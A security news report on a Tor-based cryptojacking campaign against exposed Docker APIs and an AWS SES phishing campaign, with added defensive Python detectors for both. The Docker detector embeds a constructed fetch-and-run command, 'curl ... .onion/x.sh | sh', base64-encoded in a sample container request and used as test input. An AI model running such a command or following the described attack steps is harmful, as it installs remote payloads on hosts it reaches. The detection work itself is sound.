
Cybersecurity researchers have discovered a variant of a recently disclosed campaign that abuses the Tor network for cryptojacking attacks targeting exposed Docker APIs.
Akamai, which discovered the latest activity last month, said it is designed to block other actors from accessing the Docker API from the Internet.
The findings build on a previous report from Trend Micro in late June 2025, which uncovered a malicious campaign that targeted exposed Docker instances to covertly deploy the XMRig cryptocurrency miner, using a Tor domain for anonymity.
“This new strain appears to use similar tools to the original, but may have different end goals, including the possibility of setting the foundations for complex botnets,” said security researcher Yonatan Gilvarg.
Attack chains essentially involve breaking into misconfigured Docker APIs to run a new container based on the Alpine Docker image and mount the host file system into it. This is followed by the threat actor running a base64-encoded payload that downloads a shell script downloader from a .onion domain.

In addition to changing the SSH configuration to set up persistence, the script also installs other tools such as masscan, libpcap, libpcap-dev, zstd and torsocks, performs reconnaissance, contacts the command-and-control (C2) server, and downloads a second, compressed binary from the .onion domain.
“The files that were originally downloaded do not communicate with the Internet, as they are Go-written droppers that contain the content they want to drop,” explained Gilvarg. “They parse the utmp file to find out who is currently logged in to the machine, and in addition drop another binary file.”
Interestingly, the source code of the binary contains emojis describing the users signed in to the system, which suggests the artifacts may have been created with a large language model (LLM).
The dropper also launches masscan to scan the Internet for open Docker API services on port 2375 and spread the infection to those machines by repeating the same process: creating containers with base64-encoded commands.
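The container-creation step described above leaves a recognisable shape in the Docker Engine API: an Alpine image, the host root bind-mounted, and a command that decodes an inline base64 blob and pipes it to a shell. The following is an added detection example, not code from the report or from Akamai; the request bodies are constructed samples and the .onion name is a placeholder, not an indicator from the article.

```python
import base64
import re

# Constructed sample of a Docker Engine API "POST /containers/create" body in
# the shape the article describes. The .onion host is a placeholder.
_STAGE = "curl -s http://placeholder-example.onion/x.sh | sh"
SUSPICIOUS_CREATE = {
    "Image": "alpine",
    "Cmd": ["sh", "-c", "echo " + base64.b64encode(_STAGE.encode()).decode()
            + " | base64 -d | sh"],
    "HostConfig": {"Binds": ["/:/hostroot"], "Privileged": False},
}
# Constructed benign request for comparison: a read-only content mount.
BENIGN_CREATE = {
    "Image": "nginx:1.27",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
}

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_blobs(cmd):
    """Best-effort decode of base64-looking tokens in the container command."""
    out = []
    for tok in B64_TOKEN.findall(" ".join(cmd or [])):
        try:
            out.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):
            pass
    return out


def flag_container_create(body):
    """Return the reasons a create request matches the abuse pattern (empty if none)."""
    reasons = []
    hc = body.get("HostConfig", {}) or {}
    for bind in hc.get("Binds") or []:
        if bind.split(":")[0] == "/":          # host root mounted into the container
            reasons.append("host root filesystem bind-mounted: " + bind)
    if hc.get("Privileged"):
        reasons.append("privileged container")
    cmdline = " ".join(body.get("Cmd") or [])
    if re.search(r"base64\s+(-d|--decode)", cmdline):
        reasons.append("inline base64-decoded command")
    for blob in decoded_blobs(body.get("Cmd")):
        if ".onion" in blob or "torsocks" in blob:
            reasons.append("decoded payload references Tor: " + blob.split()[0])
    return reasons
```

Feeding this over `docker events` or an API proxy log gives a simple alert on the exact combination the campaign relies on, while routine bind mounts pass through.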
Additionally, the binary includes two more port checks: 23 (Telnet) and 9222 (the remote debugging port for the Chrome browser). The capability to spread through these ports is not yet fully implemented.
The Telnet attack method involves using a set of known default router and device credentials to brute-force logins, and reporting successful sign-in attempts to a webhook[.]site endpoint with details about the destination IP address and the victim's authentication credentials.
On port 9222, the malware interacts with the web browser using a Go library named chromedp. This technique has previously been used by North Korean threat actors and by stealer malware to bypass Chrome's app-bound encryption, connect remotely to Chromium sessions, and siphon cookies and other private data.
It then connects to the existing session over the open remote debugging port, and eventually sends a POST request to the same .onion domain used to retrieve the shell script downloader, containing the source IP address of the infected host and the destination on which port 9222 is reachable.
The details are sent to an endpoint named “httpbot/add”, which suggests that devices with exposed Chrome/Chromium remote debugging ports are being registered with a botnet so that additional payloads can be delivered to steal data or perform distributed denial-of-service (DDoS) attacks.
“The malware scans only port 2375, so the logic to handle ports 23 and 9222 is currently unreachable and cannot be executed,” Gilvarg said. “However, the implementation exists and indicates future capabilities.”
“Attackers gain a great deal of control over systems affected by abused APIs. The importance of segmenting networks, limiting service exposure to the Internet, and ensuring default credentials are changed cannot be overstated. By adopting these measures, organizations can significantly reduce their exposure to such threats.”
Wiz Flags AWS SES Abuse Campaign
The disclosure comes as cloud security company Wiz detailed a campaign, observed in May 2025, that abused Amazon Simple Email Service (SES) using compromised Amazon Web Services (AWS) access keys as a launchpad for mass phishing attacks.

Currently, it is not known how the key was obtained. However, there are various ways an attacker could have achieved this: accidental public exposure in a code repository, theft from a misconfigured asset, or theft from a developer workstation using stealer malware.
“Attackers use the compromised key to access the victim’s AWS environment, bypass the built-in restrictions of SES, verify a new ‘sender’ identity, and prepare and carry out phishing operations in an orderly manner,” said Wiz researchers Itay Harel and Hila Ramati.

Wiz, which worked with Proofpoint to further investigate the phishing campaign, said the emails targeted several organizations across multiple regions and sectors, and used tax-themed lures to redirect recipients to a credential harvesting page.
“If SES is configured in an account, an attacker can send emails from a verified domain,” Wiz warned. “Beyond brand damage, this allows for phishing that appears to come from you, and can be used for spear phishing, fraud, theft of data or disruption of business processes.”
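The sequence Wiz describes (a compromised key verifies a new sender identity, works around SES sandbox limits, then sends in volume) is visible in CloudTrail as a chain of SES API calls under one access key. The following is an added example, not code from Wiz or from the report: it groups constructed CloudTrail records by access key and flags keys that register a sender identity and then send at least a threshold of messages within a window. The access key IDs, addresses and IP addresses are placeholders.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# CloudTrail eventNames for the steps the article describes: registering a new
# sender identity, asking to leave the SES sandbox, and sending mail.
IDENTITY_EVENTS = {"VerifyEmailIdentity", "VerifyDomainIdentity", "CreateEmailIdentity"}
SANDBOX_EVENTS = {"PutAccountDetails"}
SEND_EVENTS = {"SendEmail", "SendRawEmail", "SendBulkEmail"}


def _t(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def ses_abuse_findings(records, window=timedelta(hours=24), send_threshold=50):
    """Flag access keys that register a new sender identity and then send
    at least send_threshold messages within window of that registration."""
    by_key = defaultdict(list)
    for r in records:
        by_key[r.get("userIdentity", {}).get("accessKeyId", "unknown")].append(r)
    findings = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda r: _t(r["eventTime"]))
        ident = [r for r in evs if r["eventName"] in IDENTITY_EVENTS]
        if not ident:
            continue                      # no new sender registered: routine use
        start = _t(ident[0]["eventTime"])
        sends = [r for r in evs if r["eventName"] in SEND_EVENTS
                 and start <= _t(r["eventTime"]) <= start + window]
        if len(sends) >= send_threshold:
            p = lambda r: r["requestParameters"]
            findings[key] = {
                "new_identities": sorted({p(r).get("emailAddress") or p(r).get("domain")
                                          or p(r).get("emailIdentity") or "?" for r in ident}),
                "sandbox_exit_requested": any(r["eventName"] in SANDBOX_EVENTS for r in evs),
                "sends": len(sends),
                "source_ips": sorted({r["sourceIPAddress"] for r in evs}),
            }
    return findings


def _rec(name, ts, key, ip, params=None):
    return {"eventName": name, "eventTime": ts, "sourceIPAddress": ip,
            "userIdentity": {"accessKeyId": key}, "requestParameters": params or {}}


# Constructed sample: a placeholder key registers a sender, requests sandbox exit
# and sends 120 messages; a second placeholder key only sends routine mail.
SAMPLE = [_rec("VerifyEmailIdentity", "2025-05-03T10:00:00Z", "AKIAPLACEHOLDER0001",
               "203.0.113.5", {"emailAddress": "billing@victim-example.com"}),
          _rec("PutAccountDetails", "2025-05-03T10:05:00Z", "AKIAPLACEHOLDER0001", "203.0.113.5")]
SAMPLE += [_rec("SendEmail", "2025-05-03T11:%02d:00Z" % (i % 60), "AKIAPLACEHOLDER0001", "203.0.113.5") for i in range(120)]
SAMPLE += [_rec("SendEmail", "2025-05-03T09:%02d:00Z" % i, "AKIAPLACEHOLDER0002", "198.51.100.7") for i in range(10)]
```

A finding whose source IP does not match the key's normal CI or application hosts is the strongest signal to rotate the key and revoke the newly verified identity.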